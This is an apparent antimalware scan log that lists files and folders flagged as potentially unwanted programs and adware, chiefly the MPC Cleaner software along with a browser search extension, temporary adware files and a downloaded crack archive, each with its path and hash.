PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Cleaner, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\CrashReport, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\News, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Tray, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Uninstall, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\TEMP, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\TEMP\Upgrade, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.AllDaySavings, C:\Program Files\9B0D3D35-C69A-4D44-BBF5-B75ED01D6712, , [6337c2f2cfcaf145ccb5ff16649f14ec],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\external, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\external, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\fonts, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\_metadata, , [afebcce8c9d062d447b1e55856ad8b75],

Files: 260
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll, , [0d8d23917722b086b5cd8e6ad62bfd03],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe, , [9cfeb8fcc0d9ac8aff831cdc6c95d828],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\LpcManager.dll, , [1288268e5f3ae1553e4488704eb34fb1],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\WinService.dll, , [b2e8dada2178ab8b5f23e41458a9ad53],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XProcessBus.dll, , [9901625255443df9730f05f37190aa56],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Report.dll, , [bddd377d12871e18bcc6c92ff60b48b8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCTray.exe, , [eeacbdf7cecbc274186a0eea59a8837d],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XBus.dll, , [cbcf07ad5b3e76c0384ac137b9482fd1],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\TrayFrame.dll, , [0991753f1584a393daa8b74138c92ed2],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Monitor.dll, , [4159a3112d6c60d6087a98609869e51b],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Database.dll, , [84163d77792093a37b07ad4bd22fb34d],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\LogReport.dll, , [54461e962f6a9d99a7dbc335c53cd729],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\BrowserPlugIn.dll, , [4159a50f55447bbb7c06a94f0bf6768a],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Cleaner.dll, , [a7f39f15732645f186fcdd1b08f901ff],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeProtect.dll, , [b2e8b3011a7f66d04042a94ff50cd22e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Update.dll, , [4c4ec0f4d2c71224f58d16e224dd08f8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Web.dll, , [6238dfd5eaafca6cc1c18870dc2510f0],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeNavi.dll, , [4753367ebbdeda5cfc866296d72a5ba5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe, , [4f4b5361bcdd59dd2a58d4249170bb45],
PUP.Optional.MorePowerfulCleaner, C:\Windows\System32\drivers\MPCKpt.sys, , [4654981c78218ea8b9949866e71afa06],
PUP.Optional.Conduit, C:\Users\Administrator\Documents\Downloads\bsplayer257.1051ENnew.exe, , [4753f5bf85143402b224b368a95953ad],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SafeNavi64.dll, , [5545288cdebb8fa7463c8870e71abe42],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MainFrame.dll, , [1e7cb6fe06933ef896ec94645da4c838],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPC.exe, , [0397585c9dfc59ddb2d0f404f40dc838],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCAutoClean.exe, , [2f6b09ab6732de58ff838078ac55c53b],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCNews.exe, , [e6b4bafa762391a561217e7ac43dd828],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MpcSafeDll64.dll, , [e6b4aa0af6a372c4305223d53bc643bd],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCSecurity.exe, , [801af5bf51486cca80021ddb897819e7],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCSetting.exe, , [aceee1d36b2e270fbac8c13721e05ba5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\SetupFrame.dll, , [5a40b202f6a348ee95edd622936eaa56],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Uninstall.exe, , [f6a4476dd8c17fb71171b44429d8827e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\UninstallFrame.dll, , [e2b802b223769d99404217e1db264bb5],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\UninstDelete.exe, , [f2a8e5cf2b6e1f17740e7583d62b8977],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\UpdateHost.exe, , [9802219346532f07671bc533be4318e8],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Upgrade.dll, , [14862b8979200c2ae2a0689033ce0ef2],
PUP.Optional.InstallCore, C:\$RECYCLE.BIN\S-1-5-21-4246815794-1745546178-596238576-500\$R32OW6K.exe, , [07935c58adec3afc09fb47d854ae53ad],
PUP.Optional.InstallCore, C:\$RECYCLE.BIN\S-1-5-21-4246815794-1745546178-596238576-500\$RNBO7PB.exe, , [e1b981337524ee4852b2c25d887a8779],
Adware.ConvertAd, C:\Windows\Temp\vns4ADB.tmp, , [504a7143d1c892a493f0729df1117888],
PUP.Optional.CouponMarvel, C:\Windows\Temp\BC40.tmp, , [28724272eeab45f1869a8a259b6612ee],
PUP.Optional.ConvertAd, C:\Windows\Temp\BC41.tmp, , [8e0c892b8415ad89382db23c7f8231cf],
Adware.ConvertAd, C:\Windows\Temp\BC42.tmp, , [4654555fd0c992a47d5a73bbf41112ee],
PUP.Optional.OutBrowse, C:\Users\Administrator\Downloads\FonePaw Android Data Recovery 1.2.0 Crack is Here Latest .rar, , [42587440742581b5898ca13ed32e0df3],
PUP.Optional.MorePowerfulCleaner, C:\Users\Public\Desktop\MPC Cleaner.lnk, , [abef912330698aacc3f9efb72cd89b65],
PUP.Optional.MorePowerfulCleaner, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC\MPC Cleaner.lnk, , [9901714390092a0c506d822411f337c9],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\symsrv.yes, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AdbWinApi.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AdbWinUsbApi.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AdcManager.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\AndriodServer.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\CeBase.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\CrashReport.exe, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\dbgkpt.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\isafechlp.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT.manifest, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\MPCBS.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\msvcm90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\msvcp110.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\msvcp90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\msvcr110.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\msvcr90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\nmlct, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\silence.ini, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\snh.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Support.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\symsrv.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Utility.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\versioninfo.ini, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\wfhxte.dat, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\xadb.exe, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\XSkin.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Exe\ADC_qd00000.exe, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\Clean.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\PlugIn.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\DB\as.db, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\DB\cf.db, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\DB\run.db, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Config\DB\st.db, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCBase_32.sys, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt.inf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt.sys, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_32.sys, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_64.sys, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_xp_32.sys, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q2.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\ad_gray.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\ad_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\ad_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\ad_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g1.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g10.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g11.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g12.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g2.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g3.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g4.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g5.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g6.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g7.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g8.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\g9.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q1.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q10.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q11.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q12.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q3.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q4.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q5.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q6.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q7.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q8.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\q9.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r1.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r10.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r11.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r12.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r2.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r3.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r4.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r5.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r6.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r7.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r8.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\r9.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\sys_gray.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\sys_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\sys_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\sys_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y1.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y10.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y11.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y12.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y2.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y3.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y4.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y5.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y6.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y7.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y8.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\y9.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{08DA4B46-E0EB-4B4D-8C8B-558C967AF6C5}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{22A8D5A3-F368-4C6B-BF4D-3C901EBCF242}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{3F9A707D-2C36-4344-8621-B8E4ADC95C18}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{ADC520A9-B4B3-791E-B149-845C11673CB0}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{CDA529A9-B1B3-793E-B449-845C11673CB5}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{D8EC46AF-529F-4636-963B-C086429C73DA}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{DE37CD8C-DE7B-481F-A676-303ABAFBEE04}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{EDA029A1-B5BA-793E-B649-875C18673CC5}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{F154C596-75A9-4028-90E8-9752BD7CA05B}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\search_{FDA029A2-A5BA-797E-B689-875E18673FC2}.ico, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SearchIcon\toasts_waring.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\adcapp.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\adcweb.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\block.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\home.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\ie.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SgIcon\search.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\AR_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\AR_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\AR_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\Bp_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\Bp_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\Bp_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SpeedUp_green.png, , [25759222d9c00f279875d7d05fa5b24e],
